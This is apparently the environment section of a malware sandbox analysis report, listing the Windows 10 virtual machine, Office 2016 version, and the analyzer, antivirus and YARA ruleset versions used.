Name win10_64_th2_en_mso2016
Description win10_64_th2_en_mso2016
Architecture x86 64-bit
Operating System Windows 10 Threshold 2
Kernel Version 10.0.10586.0 (0de6dc23-8e19-4bb7-8608-d54b1e6fa379)
Network Scheme Name Local Gateway
Network Config Name Local Gateway
Analyzer Information
Analyzer Version 4.1.1
Dynamic Engine Version 4.1.1 / 02/08/2021 15:19
Static Engine Version 1.6.0
Built-in AV Version AVCORE v2.2 Linux/x86_64 11.0.1.19 (November 12, 2020)
Built-in AV Database Update Release Date 2021-03-23 09:59:16+00:00
VTI Ruleset Version 3.8
YARA Built-in Ruleset Version 1.5
Analysis Report Layout Version 10
Software Information
Adobe Acrobat Reader Version Not installed
Microsoft Office 2016
Microsoft Office Version 16.0.4266.1003
Internet Explorer Version 11.0.10586.0
Chrome Version Not installed
Firefox Version Not installed
Flash Version Not installed
Java Version Not installed